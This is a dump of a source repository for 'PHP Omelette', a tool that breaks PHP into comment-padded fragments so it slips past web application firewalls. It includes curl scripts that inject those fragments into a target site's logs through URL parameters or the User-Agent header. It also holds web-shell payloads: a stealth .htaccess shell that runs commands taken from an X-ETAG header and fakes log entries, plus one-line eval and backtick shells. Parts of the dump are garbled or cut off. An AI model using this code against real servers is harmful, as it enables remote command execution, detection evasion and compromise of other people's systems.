├── .gitignore
├── README.md
├── injectUA.sh
├── injectlog.sh
├── omelette
├── plate
├── t
├── .htaccess
├── backtick.php
├── ccc.php
├── ccc2.php
├── condensed.php
├── condensed2.php
├── index.php
├── php_parse.php
├── shell1.php
├── shell2.php
├── shell3.php
├── shell4.php
├── sht-plain.php
├── sht.php
├── t1.php
├── t2.php
├── t3.php
├── test.js
└── test.php
└── view-clean.sh
/.gitignore:
--------------------------------------------------------------------------------
1 | plate
2 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | PHP OMELETTE
2 | ===============================================================================
3 | A code fragmentation technique for avoiding filtering or detection from things
4 | like web application firewalls. Inspired by the concept of fragmented shellcode
5 | used in memory corruption [omelet][1] and can scatter fragmented PHP code
6 | through log files yet still execute it as a single bit of PHP.
7 |
8 | The broad concept is:
9 | 1. Everything inside the `` tags is code
10 | 2. Everything inside the `/*` `*/` multi line comments are ignored
11 | 3. PHP parsing has some flexibility
12 |
13 | The preferred use of this is to inject a small stager payload, but bigger files
14 | could be transformed as well.
15 |
16 | The steps are simple enough that they can be performed manually:
17 | 1. Add comment after all opening tags
18 | 2. Add comment before all closing tags
19 | 3. Add comments before and after semi colons
20 | 4. Add comment after comma
21 | 5. Add comments before and after opening and closing parentheses
22 | 6. Remove duplicate comments
23 | 7. Insert new line before each closing multi line comment
24 | 8. Remove empty lines
25 |
26 | More steps can be added, or you can implement your own version, but keeping
27 | them simple means you can use the steps on other languages like JavaScript as
28 | well.
29 |
30 | This repository includes some scripts to help automate the process of
31 | fragmenting and injecting the code, and some "debugging" tools. The automated
32 | process is not syntax aware so beware when using strings or embedding PHP in
33 | things like HTML.
34 |
35 | omelette
36 | -------------------------------------------------------------------------------
37 | The main script for fragmenting PHP code, uses regex to generate fragmented PHP
38 | code. Code is given as the first argument. Examples:
39 |
40 | ```bash
41 | $ ./omelette '=eval($_GET[0])?>'
42 | $ ./omelette "$(cat t/shell3.php)" > plate
43 | ```
44 |
45 | injectlog.sh and injectUA.sh
46 | -------------------------------------------------------------------------------
47 | Automatically fragment and inject the omelette to a website. Takes PHP code as
48 | first argument and a URL as the second. Will send injection as parameter or via
49 | UserAgent. Examples:
50 |
51 | ```bash
52 | $ ./injectlog.sh '' 'http://example.com?id=1&inject='
53 | $ ./injectUA.sh "$(cat t/shell1.php)" http://example.com
54 | ```
55 | view-clean.sh
56 | -------------------------------------------------------------------------------
57 | Tries to show the fragmented code in a cleaner/readable format. Example:
58 |
59 | ```
60 | ./view-clean.sh ./plate
61 | ```
62 |
63 | php_parse.php
64 | -------------------------------------------------------------------------------
65 | Breaks PHP code into parsed tokens, handy when seeing how the PHP parser deals
66 | with fragmented code:
67 |
68 | ```
69 | php php_parse.php ./file
70 | ```
71 |
72 | Credits
73 | ===============================================================================
74 | Wireghoul - http://www.justanotherhacker.com
75 |
76 | References:
77 | [1]: "Eggs to omelet"
78 |
--------------------------------------------------------------------------------
/injectUA.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | code=$1
4 | ./omelette "${code}" > plate
5 | echo [*] Scrambling code
6 | echo [*] Checking code
7 | php -l plate >/dev/null 2>&1
8 |
9 | if [ $? != 0 ]; then
10 | echo "Scrambling PHP returned broken code in file 'plate'"
11 | exit 2;
12 | fi
13 |
14 | echo [*] Injecting code via User Agent
15 | while read -r line; do
16 | echo -n " | ${line} \t>> $2 => "
17 | curl -k -s -i -A "Omelette/1.0 (${line})" "$2" | head -1
18 | done plate
5 | echo [*] Scrambling code
6 | echo [*] Checking code
7 | php -l plate >/dev/null 2>&1
8 |
9 | if [ $? != 0 ]; then
10 | echo "Scrambling PHP returned broken code in file 'plate'"
11 | exit 2;
12 | fi
13 |
14 | echo [*] Injecting code by appending to URL
15 | while read -r line; do
16 | p=`php -r "print urlencode('${line}');"`
17 | echo -n " | ${line}\t>> $2${p} => "
18 | curl -k -s -i -A "Omelette/1.0" "$2${p}" | head -1
19 | done>> >>> /**/?>
42 | et = re.compile('(\?>)')
43 | code = et.sub(r'/**/\1', code)
44 |
45 | # Add comment around semi colon
46 | # ; >>> /**/;/**/
47 | sc = re.compile('(\;)')
48 | code = sc.sub(r'/**/\1/**/', code)
49 |
50 | # Add comment after comma
51 | cm = re.compile('(\,)')
52 | code = cm.sub(r'\1/**/', code)
53 |
54 | # Before and after ( )
55 | pt = re.compile('(\(|\))')
56 | code = pt.sub(r'/**/\1/**/', code)
57 |
58 | # Future additions? ( \"|\" |\[|\]) ?
59 |
60 | # Remove dupe comments
61 | dp = re.compile('(/\*\*/ */\*\*/)')
62 | code = dp.sub(r'/**/', code)
63 |
64 | # Insert newlines
65 | nl = re.compile('(\*/)')
66 | code = nl.sub(r'\n\1', code)
67 |
68 | # Strip empty lines
69 | bl = re.compile('(\n\s*\n)')
70 | code = bl.sub(r'\n', code)
71 | #code = re.sub(r'\n\s*\n', '\n', code, flags=re.MULTILINE)
72 |
73 | print(code)
74 |
--------------------------------------------------------------------------------
/plate:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/t/.htaccess:
--------------------------------------------------------------------------------
1 | # Self contained .htaccess stealth web shell - Part of the htshell project
2 | # Written by Wireghoul - http://www.justanotherhacker.com
3 |
4 | # Override default deny rule to make .htaccess file accessible over web
5 |
6 | # Uncomment the line below for Apache2.4 and newer
7 | # Require all granted
8 | Order allow,deny
9 | Allow from all
10 |
11 |
12 | # Make .htaccess file be interpreted as a php file. This occurs after Apache has interpreted
13 | # the Apache directives from the .htaccess file
14 | AddType application/x-httpd-php .htaccess
15 |
16 | # Enable output buffering so we can fudge content length in logs (see the ob_* calls)
17 | php_value output_buffering 1
18 |
19 | # Rewrite supposed url to the .htaccess file if X-ETAG request header is set
20 | RewriteEngine on
21 | RewriteCond %{HTTP:X-ETAG} !^$
22 | RewriteRule .* .htaccess [L]
23 | RewriteCond %{HTTP:X-ETAG} ^$
24 | RewriteRule .htaccess - [F]
25 |
26 | # Set $e to exec(), discard 2 byte padding on base64 encoding (breaks automated decoding), payload in X-ETAG header
27 | # Then make sure the log contains a 200 ok response with response size of 9326 (should match the file you are impersonating or a code in a 404 response)
28 | # SHELL &1", $o); header("X-ETAG: AA".base64_encode(implode("\r\n ", $o))); print str_repeat(" ", 9326); ob_flush(); exit(); ?>
29 |
--------------------------------------------------------------------------------
/t/backtick.php:
--------------------------------------------------------------------------------
1 | =`$_GET[1]`;?>
2 |
--------------------------------------------------------------------------------
/t/ccc.php:
--------------------------------------------------------------------------------
1 |
7 |
8 |
13 |
14 |
15 | Test
16 | =phpinfo();?>
17 |
24 | ...
25 |
26 |